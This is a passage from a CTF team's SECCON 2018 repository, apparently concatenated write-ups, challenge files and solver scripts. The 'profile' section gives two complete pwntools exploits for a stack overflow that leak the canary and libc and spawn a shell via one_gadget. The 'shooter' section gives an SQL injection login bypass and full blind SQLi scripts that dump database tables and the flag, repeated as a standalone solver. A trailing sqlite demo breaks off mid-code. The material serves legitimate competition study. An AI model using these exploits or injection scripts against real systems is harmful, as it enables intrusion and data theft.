313 | 314 | ```cpp 315 | __int64 __fastcall Profile::update_msg(Profile *this) 316 | { 317 | __int64 v1; // rax 318 | __int64 result; // rax 319 | void *ptr; // [rsp+10h] [rbp-10h] 320 | size_t v4; // [rsp+18h] [rbp-8h] 321 | 322 | ptr = (void *)std::__cxx11::basic_string,std::allocator>::c_str(this); 323 | v4 = malloc_usable_size(ptr); 324 | if ( v4 == 0 ) 325 | { 326 | v1 = std::operator<<>(&std::cout, "Unable to update message."); 327 | result = std::ostream::operator<<(v1, &std::endl>); 328 | } 329 | else 330 | { 331 | std::operator<<>(&std::cout, "Input new message >> "); 332 | result = getn((char *)ptr, v4); 333 | } 334 | return result; 335 | } 336 | ``` 337 | 338 | Kita dapat mengubah message sejumlah hasil dari malloc_usable_size(message). 339 | Pada cpp, string disimpan pada heap. Namun, ada Small String Optimization (SSO). SSO mengoptimasi penggunaan string dengan menuliskan string kecil pada stack. 340 | 341 | Apa output dari malloc_usable_size(message) apabila string kecil (disimpan pada stack)? 342 | 343 | ``` 344 | call 0x400e90 345 | => 0x4010be : mov QWORD PTR [rbp-0x8],rax 346 | ... 347 | 348 | gdb-peda$ p $rax 349 | $1 = 0xfffffffffffffff0 350 | ``` 351 | 352 | Outputnya ternyata adalah bilangan negatif, karena bilangan tersebut diinterpretasikan sebagai unsigned (nilai menjadi sangat besar), kita mendapatkan overflow pada stack. 353 | Mari analisa penyimpanan message, name, dan age pada program. 
354 | 
355 | ```
356 | __int64 __fastcall Profile::set_name(__int64 a1, __int64 a2)
357 | {
358 |   return std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::operator=(a1 + 32, a2);
359 | }
360 | 
361 | Profile *__fastcall Profile::set_age(Profile *this, int a2)
362 | {
363 |   Profile *result; // rax
364 | 
365 |   result = this;
366 |   *((_DWORD *)this + 16) = a2;
367 |   return result;
368 | }
369 | 
370 | __int64 __fastcall Profile::set_msg(__int64 a1, __int64 a2)
371 | {
372 |   return std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::operator=(a1, a2);
373 | }
374 | ```
375 | 
376 | So the program keeps the message at `Profile + 0`, the name at `Profile + 32` and the age at `Profile + 64` (`set_age` writes DWORD index 16 of `this`, i.e. byte offset 64).
377 | Here is the Profile object in memory with short (SSO) strings for message and name.
378 | 
379 | ```
380 | gdb-peda$ x/12gx 0x7fff85a09e90
381 | 0x7fff85a09e90: 0x00007fff85a09e60 <= pointer to msg   0x0000000000000002 <= msg length
382 | 0x7fff85a09ea0: 0x0000000000006161 <= msg buffer       0x0000000000000000
383 | 0x7fff85a09eb0: 0x00007fff85a09e80 <= pointer to name  0x0000000000000007 <= name length
384 | 0x7fff85a09ec0: 0x0061616161616161 <= name buffer      0x0000000000000000
385 | 0x7fff85a09ed0: 0x0000000000000001 <= age              0xef86cdc445a5ec00 <= canary
386 | 0x7fff85a09ee0: 0x00007fff85a09fd0                     0x0000000000000000
387 | 0x7fff85a09ef0: 0x00000000004016b0 <= ret address      0x00007ffff74791c1 <= __libc_start_main+240
388 | 
389 | ```
390 | 
391 | We can write as much as we like into msg (0x7fff85a09ea0), but the canary is in the way.
392 | The canary can be leaked with a partial overwrite: the overflow from msg reaches the name pointer at 0x7fff85a09eb0, and changing only its lowest byte makes "show" print name.size() bytes from wherever the pointer now points.
393 | 
394 | With that one byte we can point name anywhere in 0x00007fff85a09e00 - 0x00007fff85a09eff (the block in the dump above), which is enough to read the canary consistently.
395 | For this challenge I always wrote `d9` as the partial overwrite: the lowest byte of the canary is always 0x00, so pointing one byte past it yields the other 7 bytes. With ASLR the lowest byte of the canary's address could equally be 0xf8, 0xe8, 0x38 and so on, but since the stack is 16-byte aligned (it can never be at 0x31, 0x57, 0x99, ...) there are only 16 candidates, so 0xd9 is right about one run in 16.
396 | 
397 | In the same way, writing `f8` leaks libc: name then points at the saved return address into __libc_start_main+240. After that we spawn a shell with one_gadget.
398 | Here is the code used. It takes a little while (not long) to spawn the shell, because it reconnects until the guessed byte is right. It was a bit quicker to write it this way, sorry :(
399 | 
400 | ```python
401 | from pwn import *
402 | 
403 | debug = 0
404 | one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]  # one_gadget offsets for this libc-2.23
405 | libc = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253')
406 | 
407 | while (1):
408 |     if debug:
409 |         r = process(['./profile_e814c1a78e80ed250c17e94585224b3f3be9d383'], env={"LD_PRELOAD":"./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253"})
410 |     else:
411 |         r = remote('profile.pwn.seccon.jp', 28553)
412 |     # name = 7 bytes, age, message = 2 bytes: both strings stay SSO (on the stack)
413 |     r.recvuntil('>>')
414 |     r.sendline('a' * 7)
415 |     r.recvuntil('>>')
416 |     r.sendline('31337')
417 |     r.recvuntil('>>')
418 |     r.sendline('aa')
419 |     # menu 1: fill the 16-byte msg buffer, then set the low byte of the name pointer to 0xd9 (canary + 1)
420 |     r.recvuntil('>>')
421 |     r.sendline('1')
422 |     r.recvuntil('>>')
423 |     r.sendline(p64(0) * 2 + '\xd9')
424 |     # menu 2: "show" prints name.size() == 7 bytes, i.e. canary bytes 1..7
425 |     r.recvuntil('>>')
426 |     r.sendline('2')
427 |     r.recvuntil('Name : ')
428 |     canary = u64('\x00' + r.recvline().strip())
429 |     if (canary < (1 << 56)):  # wrong guess of the low byte: reconnect and try again
430 |         r.close()
431 |         continue
432 |     # menu 1 again: low byte 0xf8 -> name points at the saved return address into libc
433 |     r.recvuntil('>>')
434 |     r.sendline('1')
435 |     r.recvuntil('>>')
436 |     r.sendline(p64(0) * 2 + '\xf8')
437 |     # menu 2: 7 bytes of the return address (its top byte is 0 anyway)
438 |     r.recvuntil('>>')
439 |     r.sendline('2')
440 |     r.recvuntil('Name : ')
441 |     lsm = u64(r.recvline().strip().ljust(8, '\x00'))
442 |     if (lsm < 0x7f0000000000):
443 |         r.close()
444 |         continue
445 |     # libc base from __libc_start_main+240
446 |     libc_base = lsm - libc.symbols.__libc_start_main - 240
447 |     print hex(canary)
448 |     print hex(libc_base)
449 |     # final overflow: 7 qwords up to the canary, the canary, 3 qwords, one_gadget over main's return address
450 |     r.recvuntil('>>')
451 |     r.sendline('1')
452 |     r.recvuntil('>>')
453 |     r.sendline(p64(0) * 7 + p64(canary) + p64(0) * 3 + p64(libc_base + one[0]))
454 |     # menu 0: leave main -> ret into one_gadget
455 |     r.sendline('0')
456 | 
457 |     r.interactive()
458 |     break
459 | ```
460 | 
461 | Here is another solution from a team member that is more reliable (no waiting for the shell to spawn). It sets age to 16961 (0x4241, which is the bytes "AB" in memory) and scans the 16 aligned slots of the stack block by overwriting only the lowest byte of the name pointer until "show" prints "AB": that slot is the age field, and two slots below it is the name pointer itself. Pointing the name pointer at its own slot prints the address of `Profile + 32`, so the canary is 0x28 bytes above the leaked value; the `read` GOT entry then gives the libc base.
462 | 
463 | ```python
464 | from pwn import *
465 | 
466 | context.arch = "amd64"
467 | context.os = "linux"
468 | 
469 | def debug(p):
470 |     if (len(sys.argv) > 1 and sys.argv[1] == "debug"):
471 |         util.proc.wait_for_debugger(util.proc.pidof(p)[0])
472 | 
473 | ### end of template
474 | 
475 | p = remote('profile.pwn.seccon.jp', 28553)
476 | # p = process('./profile_e814c1a78e80ed250c17e94585224b3f3be9d383')
477 | binelf = ELF('./profile_e814c1a78e80ed250c17e94585224b3f3be9d383')
478 | binlib = ELF('./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253')
479 | 
480 | # initialize: name 8 bytes, age 16961 == 0x4241 == "AB" in memory, message 7 bytes
481 | p.sendline('abcdefgh')
482 | p.sendline('16961')
483 | p.sendline('abcdefg')
484 | p.recvuntil('exit')
485 | # scan slots 0xf0, 0xe0, ...: the slot that prints "AB" is the age field
486 | found = False
487 | for i in range(16):
488 |     idx = 15-i
489 | 
490 |     p.sendline('1')
491 |     p.sendline('A' * 0x10 + chr(idx * 0x10))
492 |     p.sendline('2')
493 |     p.recvuntil('Name : ')
494 |     log.debug(idx)
495 |     name = p.recvline()
496 |     if name.startswith('AB') and idx-2 >= 0:
497 |         age_on = idx
498 |         name_on = idx-1
499 |         name_ptr = idx-2
500 |         p.sendline('1')
501 |         p.sendline('A' * 0x10 + chr(name_ptr*0x10))
502 |         p.sendline('2')
503 |         p.recvuntil('Name : ')
504 |         name_leak = u64(p.recvline().strip().ljust(8, '\x00'))
505 |         found = True
506 |         break
507 | 
508 | if not found:
509 |     log.error('Failed, Try again')
510 |     exit(0)
511 | # name_leak is the address of the name pointer slot (Profile + 32); canary is Profile + 72
512 | canary_leak = name_leak + 0x28
513 | log.info('Name leak at {}'.format(hex(name_leak)))
514 | log.info('Canary leak at {}'.format(hex(canary_leak)))
515 | 
516 | p.sendline('1')
517 | p.sendline('A' * 0x10 + p64(canary_leak))
518 | p.sendline('2')
519 | p.recvuntil('Name : ')
520 | canary = u64(p.recvline().strip().ljust(8, '\x00'))
521 | 
522 | log.info('Canary {}'.format(hex(canary)))
523 | # leak read@got for the libc base
524 | p.sendline('1')
525 | p.sendline('A' * 0x10 + p64(binelf.got['read']))
526 | p.sendline('2')
527 | p.recvuntil('Name : ')
528 | read_loc = u64(p.recvline().strip().ljust(8, '\x00'))
529 | one_gadget = 0x45216 530 | one_gadget_loc = read_loc + one_gadget - binlib.symbols['read'] 531 | 532 | log.info('One Gadget {}'.format(hex(one_gadget_loc))) 533 | 534 | p.sendline('1') 535 | p.sendline('\x00' * 0x38 + p64(canary) + '\x00' * 0x18 + p64(one_gadget_loc)) 536 | 537 | p.sendline('0') 538 | 539 | p.interactive() 540 | ``` 541 | -------------------------------------------------------------------------------- /seccon2018/profile/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/profile/libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253 -------------------------------------------------------------------------------- /seccon2018/profile/profile_e814c1a78e80ed250c17e94585224b3f3be9d383: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/profile/profile_e814c1a78e80ed250c17e94585224b3f3be9d383 -------------------------------------------------------------------------------- /seccon2018/qr-checker/README.md: -------------------------------------------------------------------------------- 1 | # QR Checker 2 | --- 3 | **Points:** 222 | **Solves:** 80/653 | **Category:** QR 4 | 5 | QR Checker 6 | 7 | http://qrchecker.pwn.seccon.jp/ 8 | 9 | [Download](qr.cgi_93bb1a11da93ab2a50e61c7da1e62b34d316bc9b) 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | TODO 17 | 18 | 19 | ## Bahasa Indonesia 20 | TODO 21 | -------------------------------------------------------------------------------- /seccon2018/qr-checker/qr.cgi_93bb1a11da93ab2a50e61c7da1e62b34d316bc9b: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys, io, cgi, os 3 | from PIL import 
Image 4 | import zbarlight 5 | print("Content-Type: text/html") 6 | print("") 7 | codes = set() 8 | sizes = [500, 250, 100, 50] 9 | print('') 10 | print('') 11 | print('') 12 | print('') 13 | print('') 14 | print('')
15 | try:
16 | 	form = cgi.FieldStorage()
17 | 	data = form["uploadFile"].file.read(1024 * 256)
18 | 	image= Image.open(io.BytesIO(data))
19 | 	for sz in sizes:
20 | 		image = image.resize((sz, sz))
21 | 		result= zbarlight.scan_codes('qrcode', image)
22 | 		if result == None:
23 | 			break
24 | 		if 1 < len(result):
25 | 			break
26 | 		codes.add(result[0])
27 | 	for c in sorted(list(codes)):
28 | 		print(c.decode())
29 | 	if 1 < len(codes):
30 | 		print("SECCON{" + open("flag").read().rstrip() + "}")
31 | except:
32 | 	pass
33 | print('') 34 | print('') 35 | 36 | 
-------------------------------------------------------------------------------- /seccon2018/runme/README.md: -------------------------------------------------------------------------------- 
1 | # runme
2 | ---
3 | **Points:** 102 | **Solves:** 352/653 | **Category:** Reversing
4 | 
5 | Run me.
6 | 
7 | [Download](runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68)
8 | 
9 | ---
10 | 
11 | [Bahasa Indonesia](#bahasa-indonesia)
12 | 
13 | ## English
14 | TODO
15 | 
16 | 
17 | ## Bahasa Indonesia
18 | TODO
19 | 
-------------------------------------------------------------------------------- /seccon2018/runme/runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/runme/runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68 
-------------------------------------------------------------------------------- /seccon2018/shooter/README.md: -------------------------------------------------------------------------------- 
1 | # shooter
2 | ---
3 | **Points:** 434 | **Solves:** 13/653 | **Category:** Reversing
4 | 
5 | shooter
6 | 
7 | Enjoy the game!
8 | 
9 | [Download](shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72)
10 | 
11 | ---
12 | 
13 | [Bahasa Indonesia](#bahasa-indonesia)
14 | 
15 | ## English
16 | With some recon, we learned that the APK is built with Unity. There is also a `lib/x86/libil2cpp.so` file, hinting that it is built with [IL2CPP](https://docs.unity3d.com/Manual/IL2CPP.html). We used [IL2CppDumper](https://github.com/Perfare/Il2CppDumper) to analyze the APK, feeding it `lib/x86/libil2cpp.so` and `assets/bin/Data/Managed/Metadata/global-metadata.dat` from the APK and using the `Auto (Plus)` dump method. It produced several files; the most interesting ones are `dump.cs` and `script.py`.
17 | 
18 | File `dump.cs` contains classes and interfaces.
19 | ```c#
20 | ...
21 | public static class Config // TypeDefIndex: 3750
22 | {
23 | 	// Fields
24 | 	public static string domain; // 0x0
25 | 	public static string stgDomain; // 0x4
26 | 	public static string devDomain; // 0x8
27 | 	public static string adminApi; // 0xC
28 | }
29 | ...
30 | public class GameDirector : MonoBehaviour // TypeDefIndex: 3753
31 | {
32 | 	// Methods
33 | 	public void .ctor(); // 0xB1BF86
34 | 	private void Start(); // 0xB1C018
35 | 	private void ChangeStep(); // 0xB1C123
36 | 	private void HandleChangingStep(); // 0xB1C13B
37 | 	private void Update(); // 0xB1C41C
38 | 	public void UpdateScore(); // 0xB1C283
39 | 	public void UpdateMiss(); // 0xB1C36D
40 | 	public void UpdateRanking(string rankingText); // 0xB1C450
41 | 	public void AddScore(float score); // 0xB1C4F9
42 | 	public void IncrementMiss(); // 0xB1C530
43 | 	public void SubmitScore(); // 0xB1C5D3
44 | 	public void Retry(); // 0xB1C7B6
45 | 	private IEnumerator PostScore(string name, int score); // 0xB1C716
46 | }
47 | ...
48 | ```
49 | 
50 | File `script.py` contains the recovered symbols and can be run in IDA to rename stripped functions and symbols.
51 | ```python
52 | ...
53 | SetString(0x11BB818, r'shooter.pwn.seccon.jp')
54 | SetString(0x11BB81C, r'staging.shooter.pwn.seccon.jp')
55 | SetString(0x11BB820, r'develop.shooter.pwn.seccon.jp')
56 | SetString(0x11BB824, r'/admin')
57 | SetString(0x11BB828, r'Score')
58 | SetString(0x11BB82C, r'Miss')
59 | SetString(0x11BB830, r'PlaneGenerator')
60 | SetString(0x11BB834, r'ScoreFormView')
61 | SetString(0x11BB838, r'RankingView')
62 | SetString(0x11BB83C, r'Ranking')
63 | SetString(0x11BB840, r'score')
64 | SetString(0x11BB844, r'/api/v1/scores')
65 | ...
66 | ```
67 | 
68 | So we found some interesting domains and endpoints. We tried to access http://staging.shooter.pwn.seccon.jp/admin/ and were redirected to a login page.
69 | 
70 | ![login](shooter_login.png)
71 | 
72 | We did some fuzzing and got an error whenever the password contained a `'` character.
73 | 
74 | ![error](shooter_error.png)
75 | 
76 | We suspected SQL injection. We kept fuzzing and finally logged in with the password `'))) or 1-- -`! Here we can see the last 20 scores.
77 | 
78 | ![scores](shooter_scores.png)
79 | 
80 | Other than that, nothing was interesting, so we decided to dump the database tables with boolean-based blind SQL injection using this script. A binary search on each character keeps the cost at about 8 requests per character instead of up to 255.
81 | 
82 | ```python
83 | import requests
84 | import re
85 | import string
86 | 
87 | def check(s):
88 |     sess = requests.Session()
89 |     r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/sessions/new")
90 |     auth_token = re.findall(r'name="authenticity_token" value="(.+?)"', r.text)[0]
91 |     data = {
92 |         "login_id": "admin",
93 |         "authenticity_token": auth_token,
94 |         "password": "')))||(select case when ({}) then 1 else 0 end)#".format(s)
95 |     }
96 |     r = sess.post("http://staging.shooter.pwn.seccon.jp/admin/sessions", data=data)
97 |     if not r.ok:
98 |         return False
99 |     r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/users", allow_redirects=False)
100 |     return r.status_code == 200
101 | 
102 | def dump_tables():
103 |     tables = ""
104 |     while 1:
105 |         lo = 0
106 |         hi = 255
107 |         while lo <= hi:
108 |             mid = (lo+hi)//2
109 |             s = "select ascii(substr((select group_concat(table_name) from information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'),{},1)) > {}"
110 |             s = s.format(len(tables)+1,mid)
111 |             if check(s):
112 |                 lo = mid+1
113 |             else:
114 |                 hi = mid-1
115 |         if lo == 0:
116 |             return tables
117 |         tables += chr(lo)
118 |         print(tables)
119 | 
120 | dump_tables()
121 | ```
122 | 
123 | We got this output:
124 | ```
125 | a
126 | ar
127 | ar_
128 | ar_i
129 | ...
130 | ar_internal_metadata,flags,managers,schema_migrations,score
131 | ar_internal_metadata,flags,managers,schema_migrations,scores
132 | ```
133 | 
134 | Table `flags` sounds interesting, so we dumped its columns.
135 | 
136 | ```python
137 | ...
138 | def dump_columns(table_name):
139 |     columns = ""
140 |     while 1:
141 |         lo = 0
142 |         hi = 255
143 |         while lo <= hi:
144 |             mid = (lo+hi)//2
145 |             s = "select ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = '{}'),{},1)) > {}"
146 |             s = s.format(table_name, len(columns)+1, mid)
147 |             if check(s):
148 |                 lo = mid+1
149 |             else:
150 |                 hi = mid-1
151 |         if lo == 0:
152 |             return columns
153 |         columns += chr(lo)
154 |         print(columns)
155 | 
156 | dump_columns("flags")
157 | ```
158 | 
159 | We got this output:
160 | ```
161 | i
162 | id
163 | id,
164 | id,v
165 | ...
166 | id,value,created_at,updated_a
167 | id,value,created_at,updated_at
168 | ```
169 | 
170 | Now we dump the `value` column of every row.
171 | ```python
172 | ...
173 | def dump_flag():
174 |     flag = ""
175 |     while 1:
176 |         lo = 0
177 |         hi = 255
178 |         while lo <= hi:
179 |             mid = (lo+hi)//2
180 |             s = "select ascii(substr((select group_concat(value) from flags),{},1)) > {}"
181 |             s = s.format(len(flag)+1, mid)
182 |             if check(s):
183 |                 lo = mid+1
184 |             else:
185 |                 hi = mid-1
186 |         if lo == 0:
187 |             return flag
188 |         flag += chr(lo)
189 |         print(flag)
190 | 
191 | dump_flag()
192 | ```
193 | 
194 | We got this output, and the flag is valid!
195 | ```
196 | S
197 | SE
198 | SEC
199 | SECC
200 | ...
201 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10
202 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N
203 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N}
204 | ```
205 | 
206 | Flag: `SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N}`
207 | 
208 | ## Bahasa Indonesia
209 | We learned that the APK is built with Unity. There is also a `lib/x86/libil2cpp.so` file, indicating that it is built with [IL2CPP](https://docs.unity3d.com/Manual/IL2CPP.html). We used [IL2CppDumper](https://github.com/Perfare/Il2CppDumper) to analyse the APK, feeding it `lib/x86/libil2cpp.so` and `assets/bin/Data/Managed/Metadata/global-metadata.dat` from the APK and using the `Auto (Plus)` dump method. It produced several files; the most interesting ones are `dump.cs` and `script.py`.
210 | 
211 | File `dump.cs` contains the classes and interfaces.
212 | ```c#
213 | ...
214 | public static class Config // TypeDefIndex: 3750
215 | {
216 | 	// Fields
217 | 	public static string domain; // 0x0
218 | 	public static string stgDomain; // 0x4
219 | 	public static string devDomain; // 0x8
220 | 	public static string adminApi; // 0xC
221 | }
222 | ...
223 | public class GameDirector : MonoBehaviour // TypeDefIndex: 3753
224 | {
225 | 	// Methods
226 | 	public void .ctor(); // 0xB1BF86
227 | 	private void Start(); // 0xB1C018
228 | 	private void ChangeStep(); // 0xB1C123
229 | 	private void HandleChangingStep(); // 0xB1C13B
230 | 	private void Update(); // 0xB1C41C
231 | 	public void UpdateScore(); // 0xB1C283
232 | 	public void UpdateMiss(); // 0xB1C36D
233 | 	public void UpdateRanking(string rankingText); // 0xB1C450
234 | 	public void AddScore(float score); // 0xB1C4F9
235 | 	public void IncrementMiss(); // 0xB1C530
236 | 	public void SubmitScore(); // 0xB1C5D3
237 | 	public void Retry(); // 0xB1C7B6
238 | 	private IEnumerator PostScore(string name, int score); // 0xB1C716
239 | }
240 | ...
241 | ```
242 | 
243 | File `script.py` contains the recovered symbols and can be run in IDA to restore the names of functions and symbols.
244 | ```python
245 | ...
246 | SetString(0x11BB818, r'shooter.pwn.seccon.jp')
247 | SetString(0x11BB81C, r'staging.shooter.pwn.seccon.jp')
248 | SetString(0x11BB820, r'develop.shooter.pwn.seccon.jp')
249 | SetString(0x11BB824, r'/admin')
250 | SetString(0x11BB828, r'Score')
251 | SetString(0x11BB82C, r'Miss')
252 | SetString(0x11BB830, r'PlaneGenerator')
253 | SetString(0x11BB834, r'ScoreFormView')
254 | SetString(0x11BB838, r'RankingView')
255 | SetString(0x11BB83C, r'Ranking')
256 | SetString(0x11BB840, r'score')
257 | SetString(0x11BB844, r'/api/v1/scores')
258 | ...
259 | ```
260 | 
261 | We found some interesting domains and endpoints. We tried to access
262 | http://staging.shooter.pwn.seccon.jp/admin/ and were redirected to a login page.
263 | 
264 | ![login](shooter_login.png)
265 | 
266 | We did some fuzzing and got an error whenever the password contained a `'` character.
267 | 
268 | ![error](shooter_error.png)
269 | 
270 | We suspected the page was vulnerable to SQL injection. We kept fuzzing and finally logged in with the password `'))) or 1-- -`! From here we can see the last 20 scores.
271 | 
272 | ![scores](shooter_scores.png)
273 | 
274 | Other than that, nothing was interesting. We decided to dump all database tables with boolean-based blind SQL injection, using binary search to speed up the process.
275 | 
276 | ```python
277 | import requests
278 | import re
279 | import string
280 | 
281 | def check(s):
282 |     sess = requests.Session()
283 |     r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/sessions/new")
284 |     auth_token = re.findall(r'name="authenticity_token" value="(.+?)"', r.text)[0]
285 |     data = {
286 |         "login_id": "admin",
287 |         "authenticity_token": auth_token,
288 |         "password": "')))||(select case when ({}) then 1 else 0 end)#".format(s)
289 |     }
290 |     r = sess.post("http://staging.shooter.pwn.seccon.jp/admin/sessions", data=data)
291 |     if not r.ok:
292 |         return False
293 |     r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/users", allow_redirects=False)
294 |     return r.status_code == 200
295 | 
296 | def dump_tables():
297 |     tables = ""
298 |     while 1:
299 |         lo = 0
300 |         hi = 255
301 |         while lo <= hi:
302 |             mid = (lo+hi)//2
303 |             s = "select ascii(substr((select group_concat(table_name) from information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'),{},1)) > {}"
304 |             s = s.format(len(tables)+1,mid)
305 |             if check(s):
306 |                 lo = mid+1
307 |             else:
308 |                 hi = mid-1
309 |         if lo == 0:
310 |             return tables
311 |         tables += chr(lo)
312 |         print(tables)
313 | 
314 | dump_tables()
315 | ```
316 | 
317 | We got this output:
318 | ```
319 | a
320 | ar
321 | ar_
322 | ar_i
323 | ...
324 | ar_internal_metadata,flags,managers,schema_migrations,score
325 | ar_internal_metadata,flags,managers,schema_migrations,scores
326 | ```
327 | 
328 | Table `flags` looks interesting, so we dumped its columns.
329 | 
330 | ```python
331 | ...
332 | def dump_columns(table_name):
333 |     columns = ""
334 |     while 1:
335 |         lo = 0
336 |         hi = 255
337 |         while lo <= hi:
338 |             mid = (lo+hi)//2
339 |             s = "select ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = '{}'),{},1)) > {}"
340 |             s = s.format(table_name, len(columns)+1, mid)
341 |             if check(s):
342 |                 lo = mid+1
343 |             else:
344 |                 hi = mid-1
345 |         if lo == 0:
346 |             return columns
347 |         columns += chr(lo)
348 |         print(columns)
349 | 
350 | dump_columns("flags")
351 | ```
352 | 
353 | We got this output:
354 | ```
355 | i
356 | id
357 | id,
358 | id,v
359 | ...
360 | id,value,created_at,updated_a
361 | id,value,created_at,updated_at
362 | ```
363 | 
364 | Now we dump the `value` column of every row.
365 | ```python
366 | ...
367 | def dump_flag():
368 |     flag = ""
369 |     while 1:
370 |         lo = 0
371 |         hi = 255
372 |         while lo <= hi:
373 |             mid = (lo+hi)//2
374 |             s = "select ascii(substr((select group_concat(value) from flags),{},1)) > {}"
375 |             s = s.format(len(flag)+1, mid)
376 |             if check(s):
377 |                 lo = mid+1
378 |             else:
379 |                 hi = mid-1
380 |         if lo == 0:
381 |             return flag
382 |         flag += chr(lo)
383 |         print(flag)
384 | 
385 | dump_flag()
386 | ```
387 | 
388 | We got this output, and the flag is valid!
389 | ```
390 | S
391 | SE
392 | SEC
393 | SECC
394 | ...
395 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10 396 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N 397 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N} 398 | ``` 399 | 400 | Flag: `SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N}` -------------------------------------------------------------------------------- /seccon2018/shooter/shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/shooter/shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72 -------------------------------------------------------------------------------- /seccon2018/shooter/shooter_error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/shooter/shooter_error.png -------------------------------------------------------------------------------- /seccon2018/shooter/shooter_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/shooter/shooter_login.png -------------------------------------------------------------------------------- /seccon2018/shooter/shooter_scores.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/shooter/shooter_scores.png -------------------------------------------------------------------------------- /seccon2018/shooter/solve_shooter.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import string 4 | 5 | def check(s): 6 | sess = requests.Session() 7 | r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/sessions/new") 8 | auth_token = 
re.findall(r'name="authenticity_token" value="(.+?)"', r.text)[0] 9 | data = { 10 | "login_id": "admin", 11 | "authenticity_token": auth_token, 12 | "password": "')))||(select case when ({}) then 1 else 0 end)#".format(s) 13 | } 14 | r = sess.post("http://staging.shooter.pwn.seccon.jp/admin/sessions", data=data) 15 | if not r.ok: 16 | return False 17 | r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/users", allow_redirects=False) 18 | return r.status_code == 200 19 | 20 | def dump_tables(): 21 | tables = "" 22 | while 1: 23 | lo = 0 24 | hi = 255 25 | while lo <= hi: 26 | mid = (lo+hi)//2 27 | s = "select ascii(substr((select group_concat(table_name) from information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'),{},1)) > {}" 28 | s = s.format(len(tables)+1,mid) 29 | if check(s): 30 | lo = mid+1 31 | else: 32 | hi = mid-1 33 | if lo == 0: 34 | return tables 35 | tables += chr(lo) 36 | print(tables) 37 | 38 | def dump_columns(table_name): 39 | columns = "" 40 | while 1: 41 | lo = 0 42 | hi = 255 43 | while lo <= hi: 44 | mid = (lo+hi)//2 45 | s = "select ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = '{}'),{},1)) > {}" 46 | s = s.format(table_name, len(columns)+1, mid) 47 | if check(s): 48 | lo = mid+1 49 | else: 50 | hi = mid-1 51 | if lo == 0: 52 | return columns 53 | columns += chr(lo) 54 | print(columns) 55 | 56 | def dump_flag(): 57 | flag = "" 58 | while 1: 59 | lo = 0 60 | hi = 255 61 | while lo <= hi: 62 | mid = (lo+hi)//2 63 | s = "select ascii(substr((select group_concat(value) from flags),{},1)) > {}" 64 | s = s.format(len(flag)+1, mid) 65 | if check(s): 66 | lo = mid+1 67 | else: 68 | hi = mid-1 69 | if lo == 0: 70 | return flag 71 | flag += chr(lo) 72 | print(flag) 73 | 74 | dump_tables() 75 | print() 76 | 77 | dump_columns("flags") 78 | print() 79 | 80 | dump_flag() 81 | print() 82 | 
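The boolean-based extraction used in the shooter write-up, generalized as an added example (editor's code, not the team's solver). It runs the same binary-search oracle offline against an in-memory sqlite3 database that stands in for the challenge's MySQL. The shape of the vulnerable login query is an assumption: the `')))` prefix of the team's payloads suggests the password was interpolated inside three parentheses, so that is what the model does. Because sqlite differs from MySQL, the payload uses `or` instead of `||`, `-- ` instead of `#`, and `unicode()` instead of `ascii()`; the parameterized query shows the fix.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the challenge database (sqlite3 in memory)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE flags (id INTEGER PRIMARY KEY, value TEXT);
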